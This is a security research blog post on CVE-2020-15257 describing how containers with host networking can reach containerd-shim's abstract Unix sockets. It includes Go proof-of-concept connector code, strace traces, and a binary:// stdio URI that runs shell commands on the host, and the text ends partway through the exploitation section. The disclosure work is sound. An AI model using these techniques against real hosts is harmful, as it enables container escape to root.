[This was originally posted at https://research.nccgroup.com/2020/12/10/abstract-shimmer-cve-2020-15257-host-networking-is-root-equivalent-again/.]
This post is a technical discussion of the underlying vulnerability of CVE-2020-15257, and how it can be exploited. Our technical advisory on this issue is available here, but this post goes much further into the process that led to finding the issue, the practicalities of exploiting the vulnerability itself, various complications around fixing the issue, and some final thoughts.
Background
During an assessment a while back, I found an issue that enabled running
arbitrary code in a Docker container that was running with host networking
(e.g. --network=host). Normally, this is pretty bad, because with Docker’s
default capabilities, host networking enables listening in on all traffic and
sending raw packets from arbitrary interfaces. But on the given system, there
wasn’t a ton of attack surface; all traffic was encrypted directly to processes
without load balancers and the only interesting attack seemed to be using raw
packets to handshake with Let’s Encrypt and mint TLS certificates.
Sometime later, I started to think about it again, and I noticed something
when running a netstat command while in a host network Docker container:
# netstat -xlp
Active UNIX domain sockets (only servers)
Proto RefCnt Flags Type State I-Node PID/Program name Path
...
unix 2 [ ACC ] STREAM LISTENING 178355 - /var/snap/lxd/common/lxd/unix.socket
...
unix 2 [ ACC ] STREAM LISTENING 21723 - /run/containerd/containerd.sock.ttrpc
unix 2 [ ACC ] STREAM LISTENING 21725 - /run/containerd/containerd.sock
unix 2 [ ACC ] STREAM LISTENING 21780 - /var/run/docker/metrics.sock
unix 2 [ ACC ] STREAM LISTENING 14309 - /run/systemd/journal/io.systemd.journal
unix 2 [ ACC ] STREAM LISTENING 23321 - /var/run/docker/libnetwork/496e19fa620c.sock
unix 2 [ ACC ] STREAM LISTENING 18640 - /run/dbus/system_bus_socket
unix 2 [ ACC ] STREAM LISTENING 305835 - @/containerd-shim/e4c6adc8de8a1a0168e9b71052e2f6b06c8acf5eeb5628c83c3c7521a28e482e.sock@
...
unix 2 [ ACC ] STREAM LISTENING 18645 - /run/docker.sock
...
As a refresher, normal Unix domain sockets are bound to a file path, but Linux
supports “abstract namespace” Unix domain sockets that do not exist on the
filesystem. These abstract Unix sockets are created in much the same way as
normal Unix sockets, using a sockaddr_un struct:
struct sockaddr_un {
    sa_family_t sun_family;    /* AF_UNIX */
    char        sun_path[108]; /* Pathname */
};
While normal pathed Unix sockets use a sun_path containing a
NUL-terminated C string, abstract Unix sockets’ sun_path begins with a
null byte and can contain arbitrary binary content; their length is
actually based on the size passed in to the bind(2) syscall, which can
be less than the size of the sockaddr_un struct. The initial null byte
in an abstract Unix socket is generally represented with an @ sign when
printed.
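To make the distinction concrete, here is a minimal Go sketch (the name demo-abstract is purely illustrative) that binds an abstract socket by prefixing the name with a NUL byte and then connects to it; nothing ever appears on the filesystem:

package main

import (
    "fmt"
    "net"
)

func main() {
    // The leading NUL byte ("\x00") places the socket in the abstract namespace;
    // netstat/ss will show it as "@demo-abstract", and no file is created on disk.
    l, err := net.Listen("unix", "\x00demo-abstract")
    if err != nil {
        panic(err)
    }
    defer l.Close()

    // Any process that can reach this network namespace can connect by name alone;
    // there are no file permissions to consult.
    c, err := net.Dial("unix", "\x00demo-abstract")
    if err != nil {
        panic(err)
    }
    c.Close()
    fmt.Println("connected to the abstract socket without touching the filesystem")
}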
Pathed Unix domain sockets can only be connect(2)-ed to through the
filesystem, and therefore host rootfs-bound pathed Unix sockets cannot
generally be accessed from a container with a pivot_root(2)-ed rootfs.
However, abstract namespace Unix domain sockets are tied to network
namespaces.
Note: Oddly enough, even though access to pathed Unix sockets isn’t tied to
the network namespace of the process that bound them, /proc/net/unix (which is
what the above netstat command reads from to obtain its output) lists pathed
Unix sockets based on the network namespace they were bound from.
In the above netstat output, we can clearly see a bunch of pathed Unix
sockets related to container runtimes, e.g. LXD, Docker, and containerd. But we
also see an abstract Unix socket in the form of /containerd-shim/<id>.sock.
One of these appears for each Docker container that is running on a given
system.
Unlike pathed Unix sockets, which have basic access control checks applied
based on their Unix file permissions, abstract Unix sockets have no built-in
access controls and must validate connections dynamically by pulling ancillary
data with recvmsg(2) (this is also how Unix sockets can pass file descriptors
between processes). So we try to connect(2) and…
# socat abstract-connect:/containerd-shim/e4c6adc8de8a1a0168e9b71052e2f6b06c8acf5eeb5628c83c3c7521a28e482e.sock -
... socat[15] E connect(5, AF=1 "\0/containerd-shim/e4c6adc8de8a1a0168e9b71052e2f6b06c8acf5eeb5628c83c3c7521a28e482e.sock", 89): Connection refused
“Connection refused.” So my first assumption was that, whatever this thing is, it’s validating incoming connections somehow. Perhaps it only accepts one connection at a time?
containerd-shim
Reading a bit about the architecture of Docker and containerd,1 which was
spun out of Docker, we find that containerd-shim is the direct parent of a
container’s init process. This is easily observed with the following commands
run from the host:
# netstat -xlp | grep shim
unix 2 [ ACC ] STREAM LISTENING 348524 29533/containerd-sh @/containerd-shim/....sock@
# pstree -Tspn 29533
systemd(1)───containerd(733)───containerd-shim(29533)───sh(29550)
So how does this thing get set up in the first place? The relevant code is
part of the main containerd daemon, runtime/v1/shim/client/client.go:2
func WithStart(binary, address, daemonAddress, cgroup string, debug bool, exitHandler func()) Opt {
    return func(ctx context.Context, config shim.Config) (_ shimapi.ShimService, _ io.Closer, err error) {
        socket, err := newSocket(address)
        if err != nil {
            return nil, nil, err
        }
        defer socket.Close()
        f, err := socket.File()
        ...
        cmd, err := newCommand(binary, daemonAddress, debug, config, f, stdoutLog, stderrLog)
        if err != nil {
            return nil, nil, err
        }
        if err := cmd.Start(); err != nil {
            return nil, nil, errors.Wrapf(err, "failed to start shim")
        }
...

func newCommand(binary, daemonAddress string, debug bool, config shim.Config, socket *os.File, stdout, stderr io.Writer) (*exec.Cmd, error) {
    selfExe, err := os.Executable()
    if err != nil {
        return nil, err
    }
    args := []string{
        "-namespace", config.Namespace,
        "-workdir", config.WorkDir,
        "-address", daemonAddress,
        "-containerd-binary", selfExe,
    }
    ...
    cmd := exec.Command(binary, args...)
    ...
    cmd.ExtraFiles = append(cmd.ExtraFiles, socket)
    cmd.Env = append(os.Environ(), "GOMAXPROCS=2")
...

func newSocket(address string) (*net.UnixListener, error) {
    if len(address) > 106 {
        return nil, errors.Errorf("%q: unix socket path too long (> 106)", address)
    }
    l, err := net.Listen("unix", "\x00"+address)
In short, the functor returned from WithStart() creates an abstract Unix
socket from a provided address using newSocket(). It then extracts the raw
file descriptor from it and passes it directly to the child containerd-shim
process it starts with newCommand(). We can confirm that this is the code
creating our observed containerd-shim process by the command line
arguments and environment variables it passes to the child:
# ps -q 29533 -o command= | cat
containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/75aa678979e7f94411ab7a5e08e773fe5dff26a8852f59b3f60de48e96e32afc -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
# cat /proc/29533/environ | grep -a -E -o 'GOMAXPROCS=[0-9]+'
GOMAXPROCS=2
So what now? Well, we can confirm the behavior of the containerd-shim binary
with respect to how it listens on the abstract Unix socket. The relevant code
is within cmd/containerd-shim/main_unix.go:3
func serve(ctx context.Context, server *ttrpc.Server, path string) error {
    var (
        l   net.Listener
        err error
    )
    if path == "" {
        f := os.NewFile(3, "socket")
        l, err = net.FileListener(f)
        f.Close()
        path = "[inherited from parent]"
    } else {
        if len(path) > 106 {
            return errors.Errorf("%q: unix socket path too long (> 106)", path)
        }
        l, err = net.Listen("unix", "\x00"+path)
    }
Because my suspicion was that only the first connection to this socket is
accepted, it would seem that there is a race condition in the above snippets
whereby an attacker could list out the abstract namespace “path” before
the containerd-shim process is even spawned and hammer it for connections
to get the first accept(2) from containerd-shim. I then made a modified
version of the code that starts containerd-shim so that it could be tested
in isolation.
package main

import (
    "fmt"
    "io"
    "net"
    "os"
    "os/exec"
    "syscall"

    "github.com/pkg/errors"
)

// newSocket mirrors containerd's helper: it binds an abstract Unix socket by
// prefixing the address with a NUL byte.
func newSocket(address string) (*net.UnixListener, error) {
    if len(address) > 106 {
        return nil, errors.Errorf("%q: unix socket path too long (> 106)", address)
    }
    l, err := net.Listen("unix", "\x00"+address)
    if err != nil {
        return nil, errors.Wrapf(err, "failed to listen to abstract unix socket %q", address)
    }
    return l.(*net.UnixListener), nil
}

// newCommand builds a containerd-shim invocation equivalent to the one
// containerd itself would spawn, passing the listening socket as fd 3.
func newCommand(socket *os.File, stdout, stderr io.Writer) (*exec.Cmd, error) {
    args := []string{
        "-namespace", "moby",
        "-workdir", "/var/lib/containerd/io.containerd.runtime.v1.linux/moby/yolo",
        "-address", "/run/containerd/containerd.sock",
        "-containerd-binary", "/usr/bin/containerd",
        "-runtime-root", "/var/run/docker/runtime-runc",
        "-debug",
    }
    cmd := exec.Command("/usr/bin/containerd-shim", args...)
    cmd.Dir = "/run/containerd/io.containerd.runtime.v1.linux/moby/yolo"
    cmd.SysProcAttr = &syscall.SysProcAttr{
        Setpgid: true,
    }
    cmd.ExtraFiles = append(cmd.ExtraFiles, socket)
    cmd.Env = append(os.Environ(), "GOMAXPROCS=2")
    cmd.Stdout = stdout
    cmd.Stderr = stderr
    return cmd, nil
}

func main() {
    socket, err := newSocket("yoloshim")
    if err != nil {
        fmt.Printf("err: %s\n", err)
        return
    }
    defer socket.Close()
    f, err := socket.File()
    if err != nil {
        fmt.Printf("failed to get fd for socket\n")
        return
    }
    defer f.Close()
    stdoutLog, err := os.Create("/tmp/shim-stdout.log.txt")
    stderrLog, err := os.Create("/tmp/shim-stderr.log.txt")
    defer stdoutLog.Close()
    defer stderrLog.Close()
    cmd, err := newCommand(f, stdoutLog, stderrLog)
    if err != nil {
        fmt.Printf("err: %s\n", err)
        return
    }
    if err := cmd.Start(); err != nil {
        fmt.Printf("failed to start shim: %s\n", err)
        return
    }
    defer func() {
        if err != nil {
            cmd.Process.Kill()
        }
    }()
    go func() {
        cmd.Wait()
        if stdoutLog != nil {
            stdoutLog.Close()
        }
        if stderrLog != nil {
            stderrLog.Close()
        }
    }()
}
Separately, I also wrote some code to connect to the containerd-shim socket:
package main

import (
    "context"
    "fmt"
    "os"
    "time"

    "github.com/containerd/containerd/pkg/dialer"
    "github.com/containerd/ttrpc"

    shimapi "github.com/containerd/containerd/runtime/v1/shim/v1"
    ptypes "github.com/gogo/protobuf/types"
)

func main() {
    ctx := context.Background()
    socket := os.Args[1]
    conn, err := dialer.Dialer("\x00"+socket, 5*time.Second)
    if err != nil {
        fmt.Printf("failed to connect: %s\n", err)
        return
    }
    client := ttrpc.NewClient(conn, ttrpc.WithOnClose(func() {
        fmt.Printf("connection closed\n")
    }))
    c := shimapi.NewShimClient(client)
    var empty = &ptypes.Empty{}
    info, err := c.ShimInfo(ctx, empty)
    if err != nil {
        fmt.Printf("err: %s\n", err)
        return
    }
    fmt.Printf("info.ShimPid: %d\n", info.ShimPid)
}
So we run it and then try to connect to the containerd-shim socket we
created…
# mkdir -p /run/containerd/io.containerd.runtime.v1.linux/moby/yolo
# mkdir -p /var/lib/containerd/io.containerd.runtime.v1.linux/moby/yolo/
# ./startshim
# ./connectortest yoloshim
info.ShimPid: 12866
And that seems to work. For good measure, we’ll get rid of this
containerd-shim, start another one, and try socat again:
# socat ABSTRACT-CONNECT:yoloshim -
... socat[12890] E connect(5, AF=1 "\0yoloshim", 11): Connection refused
It fails, again. But our connection test code works:
# ./connectortest yoloshim
info.ShimPid: 13737
So what’s going on? Let’s see what the test code is actually doing:
# strace socat ABSTRACT-CONNECT:yoloshim -
...
socket(AF_UNIX, SOCK_STREAM, 0) = 5
connect(5, {sa_family=AF_UNIX, sun_path=@"yoloshim"}, 11) = -1 ECONNREFUSED (Connection refused)
...
# strace -f -x ./connectortest yoloshim
execve("./connectortest", ["./connectortest", "yoloshim"], 0x7ffdb4ce9e98 /* 18 vars */) = 0
...
[pid 13842] socket(AF_UNIX, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 3
[pid 13842] setsockopt(3, SOL_SOCKET, SO_BROADCAST, [1], 4) = 0
[pid 13842] connect(3, {sa_family=AF_UNIX, sun_path=@"yoloshim\0"}, 12) = 0
...
[pid 13842] write(3, "\0\0\0001\0\0\0\1\1\0\n%containerd.runtime.l"..., 59) = 59
...
[pid 13844] read(3, "\0\0\0\5\0\0\0\1\2\0\22\3\10\251k", 4096) = 15
...
[pid 13842] write(1, "info.ShimPid: 13737\n", 20info.ShimPid: 13737
) = 20
[pid 13842] exit_group(0 <unfinished ...>
...
+++ exited with 0 +++
Looking closely, it appears that when the Go code connects, it embeds a null byte within the abstract Unix domain socket “path.” Digging into Go’s internals, it appears that Go does know how to handle abstract paths:4
func (sa *SockaddrUnix) sockaddr() (unsafe.Pointer, _Socklen, error) {
    name := sa.Name
    n := len(name)
    ...
    sl := _Socklen(2)
    if n > 0 {
        sl += _Socklen(n) + 1
    }
    if sa.raw.Path[0] == '@' {
        sa.raw.Path[0] = 0
        // Don't count trailing NUL for abstract address.
        sl--
    }
However, this is arguably the wrong behavior as abstract Unix sockets can
start with a literal @ sign, and this implementation would prevent idiomatic
Go from ever connect(2)-ing (or bind(2)-ing) to them. Regardless, because
containerd embeds a raw \x00 at the start of the address, Go’s internals
keep the null byte at the end. If you look all the way at the top of this post,
you’ll see that there is, in fact, a second @ at the end of the
containerd-shim socket. And I probably should have noticed it; it’s
definitely a bit more obvious with our test socket:
# netstat -xlp | grep yolo
unix 2 [ ACC ] STREAM LISTENING 93884 13737/containerd-sh @yoloshim@
But our initial test case would have failed anyway. socat doesn’t have a
direct means of supporting arbitrary binary in abstract Unix domain socket
“paths.” You can emulate some of it with something like the following:
# socat "$(echo -en 'ABSTRACT-CONNECT:yoloshim\x01')" -
... socat[15094] E connect(5, AF=1 "\0yoloshim\x01", 12): Connection refused
But because POSIX is built around NUL-terminated C strings, the same cannot be
done for null bytes, as they will fail to pass through execve(2):
# socat "$(echo -en 'ABSTRACT-CONNECT:yoloshim\x00')" -
... socat[15099] E connect(5, AF=1 "\0yoloshim", 11): Connection refused
This is actually an issue we ran into when writing unixdump, a
tcpdump-alike for Unix sockets. As a workaround, we added the -@
flag5 that tells unixdump to parse the socket argument as base64,
specifically so that null bytes and arbitrary binary could be used. Basically,
this is something I definitely should have recognized the first time.
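For completeness, the same quirk is easy to reproduce from plain Go without ttrpc or containerd’s dialer. A minimal sketch, assuming the yoloshim test shim from above is still running:

package main

import (
    "fmt"
    "net"
)

func main() {
    // "@yoloshim" becomes the abstract name "yoloshim" with no trailing NUL;
    // like socat, this gets ECONNREFUSED from containerd-shim.
    if _, err := net.Dial("unix", "@yoloshim"); err != nil {
        fmt.Println("plain name:", err)
    }

    // "\x00yoloshim" goes through the syscall.SockaddrUnix logic shown earlier,
    // which keeps the trailing NUL in the address length, yielding the abstract
    // name "yoloshim\x00" ("@yoloshim@" in netstat) that the shim listens on.
    conn, err := net.Dial("unix", "\x00yoloshim")
    if err != nil {
        fmt.Println("NUL-prefixed name:", err)
        return
    }
    defer conn.Close()
    fmt.Println("connected to @yoloshim@")
}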
Now having a connection testing binary, we can relatively easily test if a host
network namespace container can connect to our containerd-shim or a real one:
$ docker run -it --network host --userns host -v /mnt/hgfs/go/connector/connectortest:/connectortest:ro ubuntu:18.04 /bin/sh
# /connectortest yoloshim
info.ShimPid: 13737
# cat /proc/net/unix | grep shim
0000000000000000: 00000002 00000000 00010000 0001 01 93884 @yoloshim@
0000000000000000: 00000002 00000000 00010000 0001 01 114224 @/containerd-shim/moby/2f59727263c3d8bf43ee9d2b5cc2d3218ea7c18b5abb924017873f769feb5ca5/shim.sock@
0000000000000000: 00000003 00000000 00000000 0001 03 115132 @/containerd-shim/moby/2f59727263c3d8bf43ee9d2b5cc2d3218ea7c18b5abb924017873f769feb5ca5/shim.sock@
# /connectortest /containerd-shim/moby/2f59727263c3d8bf43ee9d2b5cc2d3218ea7c18b5abb924017873f769feb5ca5/shim.sock
info.ShimPid: 15471
And it can, and that’s bad. But what is the underlying reason that we are able
to connect in the first place? Looking at the containerd-shim code that
starts the service, we see that it sets up a ttrpc “handshaker”
with ttrpc.UnixSocketRequireSameUser():6
func newServer() (*ttrpc.Server, error) {
    return ttrpc.NewServer(ttrpc.WithServerHandshaker(ttrpc.UnixSocketRequireSameUser()))
}
For reference, ttrpc is containerd’s custom gRPC-like RPC implementation; it
uses a custom wire protocol not based on TLS/HTTP/2 and focuses on supporting
embedded, low-memory environments. The implementation of
ttrpc.UnixSocketRequireSameUser() is shown below:7
// UnixSocketRequireUidGid requires specific *effective* UID/GID, rather than the real UID/GID.
//
// For example, if a daemon binary is owned by the root (UID 0) with SUID bit but running as an
// unprivileged user (UID 1001), the effective UID becomes 0, and the real UID becomes 1001.
// So calling this function with uid=0 allows a connection from effective UID 0 but rejects
// a connection from effective UID 1001.
//
// See socket(7), SO_PEERCRED: "The returned credentials are those that were in effect at the time of the call to connect(2) or socketpair(2)."
func UnixSocketRequireUidGid(uid, gid int) UnixCredentialsFunc {
    return func(ucred *unix.Ucred) error {
        return requireUidGid(ucred, uid, gid)
    }
}
...

func UnixSocketRequireSameUser() UnixCredentialsFunc {
    euid, egid := os.Geteuid(), os.Getegid()
    return UnixSocketRequireUidGid(euid, egid)
}
...

func requireUidGid(ucred *unix.Ucred, uid, gid int) error {
    if (uid != -1 && uint32(uid) != ucred.Uid) || (gid != -1 && uint32(gid) != ucred.Gid) {
        return errors.Wrap(syscall.EPERM, "ttrpc: invalid credentials")
    }
    return nil
}
Essentially, the only check performed is that the user connecting is the same
user as the one containerd-shim is running as. In the standard case, this is
root. However, if we are assuming a standard Docker container configuration
with host networking, then we can also assume that the container is not user
namespaced; in fact, neither Docker nor containerd/runc appears to support the
combination of host networking with user namespaces. Essentially, because root
on the inside of the container is in fact the same root user by UID outside the
container, we can connect to containerd-shim, even without capabilities.
$ docker run -it --network host --userns host -v /mnt/hgfs/go/connector/connectortest:/connectortest:ro --cap-drop ALL ubuntu:18.04 /bin/sh
# /connectortest /containerd-shim/moby/419fa8aca5a8a5edbbdc5595cda9142ca487770616f5a3a2af0edc40cacadf89/shim.sock
info.ShimPid: 3278
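The ucred handed to these checks comes from the kernel’s SO_PEERCRED socket option (as the ttrpc comment above notes). The following is a rough server-side sketch using golang.org/x/sys/unix (not containerd’s actual plumbing, and demo-creds is an arbitrary name) that shows why the check passes: for a non-user-namespaced container, the kernel reports the in-container root simply as UID 0.

package main

import (
    "fmt"
    "net"

    "golang.org/x/sys/unix"
)

// peerCred pulls SO_PEERCRED off a connected Unix socket. This mirrors the kind
// of data ttrpc's handshaker validates, but it is not containerd's actual code.
func peerCred(conn *net.UnixConn) (*unix.Ucred, error) {
    raw, err := conn.SyscallConn()
    if err != nil {
        return nil, err
    }
    var (
        ucred *unix.Ucred
        serr  error
    )
    if err := raw.Control(func(fd uintptr) {
        // The kernel reports the peer's PID/UID/GID as they were at connect(2) time.
        ucred, serr = unix.GetsockoptUcred(int(fd), unix.SOL_SOCKET, unix.SO_PEERCRED)
    }); err != nil {
        return nil, err
    }
    return ucred, serr
}

func main() {
    l, err := net.Listen("unix", "\x00demo-creds")
    if err != nil {
        panic(err)
    }
    defer l.Close()

    go func() {
        // Connect to ourselves so Accept() below has a peer to inspect.
        if _, err := net.Dial("unix", "\x00demo-creds"); err != nil {
            panic(err)
        }
    }()

    conn, err := l.Accept()
    if err != nil {
        panic(err)
    }
    cred, err := peerCred(conn.(*net.UnixConn))
    if err != nil {
        panic(err)
    }
    // A root process in a non-user-namespaced container shows up here with Uid=0,
    // which is exactly what UnixSocketRequireSameUser() compares against.
    fmt.Printf("peer pid=%d uid=%d gid=%d\n", cred.Pid, cred.Uid, cred.Gid)
}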
So how bad is this actually? Pretty bad as it turns out.
The Fix
But let’s take a slight segue and talk about how this issue was remediated. We first reached out to the containerd project with this advisory (also linked below). Initially, the issue was not accepted as a vulnerability because the project considered host namespacing itself to be an intractable security issue. Needless to say, I disagree with such a notion, but it was also a bit of a red herring, and after some rounds of discussion, the core issue — that containerd creates highly sensitive Unix sockets that are highly exposed — was accepted. It is worth noting that, at one point, one developer claimed that this particular issue was well known, though there does not appear to be any evidence of this being the case (at least in English); if it were, the security community would have likely jumped on the issue long ago, though the null byte quirk may have been misconstrued as an access control check.
Overall, the path to a fix wound through a couple of options before our main recommended fix, switching to pathed Unix domain sockets, was implemented. While some of these other attempts had problems that would have enabled bypasses or opened alternate avenues of attack, I think it’s important to discuss what could have been and what would have gone wrong.
Note: While security practitioners reading this post may think that switching to pathed Unix domain sockets should have been so trivial as not to have required effort to be invested into the potential hardening of abstract sockets, it is worth noting that an implicit assumption of the containerd codebase was that these sockets were essentially garbage collected on container exit. Therefore, because this was not rocket science,8 any attempt to add pathed Unix sockets required a significant amount of cleanup code and non-trivial exit detection logic to invoke it at the right times.
LSM Policies
One of the earliest discussions was on the feasibility of applying AppArmor or
SELinux policies that would prevent access to the abstract containerd sockets.
While recent versions of both AppArmor and SELinux support restricting access
to abstract namespace Unix domain sockets, they are not an ideal fix. As
containerd itself is not generally the component within a containerization
toolchain that creates such LSM policies for containers, any such attempt to
use them for this purpose would have to be implemented by each client of
containerd, or by end-users if they even have the privilege to reconfigure
those policies — which brings a large risk of misconfiguring or accidentally
eliminating the default sets of rules that help to enforce the security model
of containers. Additionally, even for containerd clients such as dockerd, it
would be tricky to implement cleanly: there is a chicken-and-egg problem, as the
implementation- and version-specific naming scheme for containerd’s internal
abstract sockets would need to be hardcoded within the client’s policy
generator. While
this could be done for Docker’s native support for AppArmor,9 anyone
attempting to use the legitimate Docker on Red Hat’s distros (e.g. RHEL,
CentOS, Fedora) instead of their also-ran podman would likely remain vulnerable
to this issue. Red Hat’s SELinux ruleset for Docker was only ever a catch-up
playing imitation of the genuine AppArmor policy and it is now likely
unmaintained given their shift in focus to their Docker clone.
Token Authentication
Another proposed fix was to introduce a form of authentication whereby, on connecting to the abstract socket, a client would need to provide a token value to prove its identity. However, the implementation used a single shared token value stored on disk and had no mechanism to prevent or rate-limit would-be clients from simply guessing the token value. While the initial implementation of this scheme had a timing side-channel due to a non-constant time token comparison — which could be heavily abused due to the communication occurring entirely on the same host through Unix sockets, without the overhead of the network stack — and also used a token generation scheme with slight biases, the main issues with this scheme are more operational. In addition to the fact that a protocol change such as this would potentially be so breaking as not to be backported, leaving large swathes of users exposed, it would also kick the can and create a valuable target for an attacker to obtain (i.e. the token) that could re-open the issue.
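As an aside, the timing side-channel half of that problem has a standard fix: compare secrets with a constant-time primitive. The sketch below is generic Go using crypto/subtle (the token value is illustrative, and this is not the patch that was proposed); it does nothing, of course, for the operational problems described above.

package main

import (
    "crypto/subtle"
    "fmt"
)

// tokenMatches compares a client-supplied token against the expected value in
// constant time, so the comparison leaks nothing about how many leading bytes
// of a guess were correct.
func tokenMatches(supplied, expected []byte) bool {
    return subtle.ConstantTimeCompare(supplied, expected) == 1
}

func main() {
    expected := []byte("example-shared-token") // illustrative value only
    fmt.Println(tokenMatches([]byte("wrong-guess"), expected))          // false
    fmt.Println(tokenMatches([]byte("example-shared-token"), expected)) // true
}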
Mount Namespace Verification
One of the more interesting proposed fixes was a scheme whereby the PID of the
caller could be obtained from the peer process Unix credentials of the socket
accessed using getsockopt(2)’s SOL_SOCKET SO_PEERCRED option. With this
PID, it would be possible to compare raw namespace ID values between the
containerd-shim process on the host and the client process (e.g. via
readlink /proc/<pid>/ns/mnt). While this is definitely a cool way of
validating the execution context of a client, it’s also extremely prone to
race conditions. There is no guarantee that, by the time userland code in the
server calls getsockopt(2) (or, in the case of a client’s setsockopt(2) call
with SOL_SOCKET and SO_PASSCRED, by the time the server receives the ancillary
message sent with each chunk of data) and processes the Unix credential data,
the client hasn’t passed the socket to a child, exited, and let another process
take its PID. In fact, this is a fairly easy race to win: the client can wait,
or spawn enough processes for PID wraparound to begin anew on the host and get
close to its own PID, before exiting. In general, attempting to determine that
the actual process connecting or sending a message to a Unix socket is the one
you think it is was likely outside the threat model of
SO_PEERCRED/SO_PASSCRED/SCM_CREDENTIALS, and is fraught with danger if the
client has UID/GID 0 (or effective CAP_SETUID/CAP_SETGID).
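To make the race concrete, a rough sketch of such a check might look like the following (illustrative only, not the proposed patch; in practice the PID would come from SO_PEERCRED, as in the earlier sketch). Nothing stops the original peer from handing its socket to another process and exiting between the getsockopt(2) call and the readlink:

package main

import (
    "fmt"
    "os"
)

// sameMountNamespace reports whether the process identified by pid appears to
// share this process's mount namespace, by comparing the /proc ns symlinks.
// The PID can be recycled by an unrelated process before or while we read
// /proc, which is exactly the TOCTOU problem described above.
func sameMountNamespace(pid int) (bool, error) {
    self, err := os.Readlink("/proc/self/ns/mnt")
    if err != nil {
        return false, err
    }
    peer, err := os.Readlink(fmt.Sprintf("/proc/%d/ns/mnt", pid))
    if err != nil {
        return false, err
    }
    return self == peer, nil
}

func main() {
    // Comparing against our own PID trivially matches; a real server would use
    // the PID reported by SO_PEERCRED for the accepted connection.
    ok, err := sameMountNamespace(os.Getpid())
    fmt.Println(ok, err)
}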
Exploitation
Given that we can talk to the containerd-shim API, what does that actually
get us? Going through the containerd-shim API protobuf,10 we can see
an API similar to Docker:
service Shim {
    ...
    rpc Create(CreateTaskRequest) returns (CreateTaskResponse);
    rpc Start(StartRequest) returns (StartResponse);
    rpc Delete(google.protobuf.Empty) returns (DeleteResponse);
    ...
    rpc Checkpoint(CheckpointTaskRequest) returns (google.protobuf.Empty);
    rpc Kill(KillRequest) returns (google.protobuf.Empty);
    rpc Exec(ExecProcessRequest) returns (google.protobuf.Empty);
    ...
}
While a number of these APIs can do fairly damaging things, the Create() and
Start() APIs are more than enough to compromise a host, but maybe not in the
way you might think. Obviously, if you can start an arbitrary container config
you can run the equivalent of a --privileged container, given that
containerd-shim generally runs as full root. But how are you going to get
such a config file and have containerd-shim load it? Let’s first take a look
at the CreateTaskRequest message passed to Create() and the StartRequest
message passed to Start():
message CreateTaskRequest {
    string id = 1;
    string bundle = 2;
    string runtime = 3;
    repeated containerd.types.Mount rootfs = 4;
    bool terminal = 5;
    string stdin = 6;
    string stdout = 7;
    string stderr = 8;
    string checkpoint = 9;
    string parent_checkpoint = 10;
    google.protobuf.Any options = 11;
}

message StartRequest {
    string id = 1;
}
As we can see from this, the pairing of these calls is very much like
docker create and docker start in that the Start() call simply starts
a container configured by Create(). So what can we do with Create()? A
fair amount as it turns out, but there are some restrictions. For example,
at the start of Create(),11 if any mounts are contained in the
rootfs field, Create() will use the base filepath provided with the
bundle field to create a rootfs directory. As of containerd 1.3.x, if it
cannot create the directory (e.g. because it already exists) Create() will
fail early.
func (s *Service) Create(ctx context.Context, r *shimapi.CreateTaskRequest) (_ *shimapi.CreateTaskResponse, err error) {
    var mounts []process.Mount
    for _, m := range r.Rootfs {
        mounts = append(mounts, process.Mount{
            Type:    m.Type,
            Source:  m.Source,
            Target:  m.Target,
            Options: m.Options,
        })
    }
    rootfs := ""
    if len(mounts) > 0 {
        rootfs = filepath.Join(r.Bundle, "rootfs")
        if err := os.Mkdir(rootfs, 0711); err != nil && !os.IsExist(err) {
            return nil, err
        }
    }
    ...
AIO (Arbitrary Command Execution IO)
The bulk of the work in Create() is handled through a call to
process.Create(ctx, config). The purpose of containerd-shim here is
essentially to serve as a managed layer around runc; for example, the
bundle field is passed directly to runc create --bundle <bundle>, which
will expect it to contain a config.json file with the container config.
However, another interesting facet of this function is how it processes
the stdio fields, stdin, stdout, and stderr with the createIO()
function.12
func createIO(ctx context.Context, id string, ioUID, ioGID int, stdio stdio.Stdio) (*processIO, error) {
    pio := &processIO{
        stdio: stdio,
    }
    ...
    u, err := url.Parse(stdio.Stdout)
    if err != nil {
        return nil, errors.Wrap(err, "unable to parse stdout uri")
    }
    if u.Scheme == "" {
        u.Scheme = "fifo"
    }
    pio.uri = u
    switch u.Scheme {
    case "fifo":
        pio.copy = true
        pio.io, err = runc.NewPipeIO(ioUID, ioGID, withConditionalIO(stdio))
    case "binary":
        pio.io, err = NewBinaryIO(ctx, id, u)
    case "file":
        filePath := u.Path
        if err := os.MkdirAll(filepath.Dir(filePath), 0755); err != nil {
            return nil, err
        }
        var f *os.File
        f, err = os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
        if err != nil {
            return nil, err
        }
        f.Close()
        pio.stdio.Stdout = filePath
        pio.stdio.Stderr = filePath
        pio.copy = true
        pio.io, err = runc.NewPipeIO(ioUID, ioGID, withConditionalIO(stdio))
    ...
Since containerd 1.3.0, the containerd-shim Create() API stdio fields can
be URIs that represent things like an IO processing binary that is run
immediately in the context of containerd-shim, outside any form of Linux
namespacing. For example, the general structure of such a URI is the following:
binary:///bin/sh?-c=cat%20/proc/self/status%20>/tmp/foobar
The only restriction is that to run a binary IO processor, the ttrpc
connection must declare a containerd namespace. This is not a Linux namespace
but an identifier used to help containerd to organize operations by client
container runtime. One such way of passing this check is the following:
ctx := context.Background()
md := ttrpc.MD{}
md.Set("containerd-namespace-ttrpc", "notmoby")
ctx = ttrpc.WithMetadata(ctx, md)
conn, err := getSocket()
if err != nil {
    fmt.Printf("err: %s\n", err)
    return
}
client := ttrpc.NewClient(conn, ttrpc.WithOnClose(func() {
    fmt.Printf("connection closed\n")
}))
c := shimapi.NewShimClient(client)
...
However, this is not as much of an interesting payload and it also doesn’t work
with containerd 1.2.x, which is the version used by Docker’s own packaging.
Instead, the underlying stdio implementation for 1.2.x only appears to support
appending to existing files. In contrast, containerd 1.3.0’s file:// URIs
will also create new files (and any necessary directories) if they do not
exist.
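For example, a hypothetical 1.3.x stdout URI that appends to (or creates) a file on the host would look like the following; per the createIO() code above, only the path component is used:

file:///tmp/shim-output.log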
Finding Yourself
To perform most of these operations, a valid bundle path must be
passed to Create(). Luckily, there are two means available to us to make such
a thing happen. The first is to use one’s own container’s ID to reference its
legitimate containerd bundle path
(e.g. /run/containerd/io.containerd.runtime.v1.linux/moby/<id>/config.json);
the ID is available within /proc/self/cgroup.
# cat /proc/self/cgroup
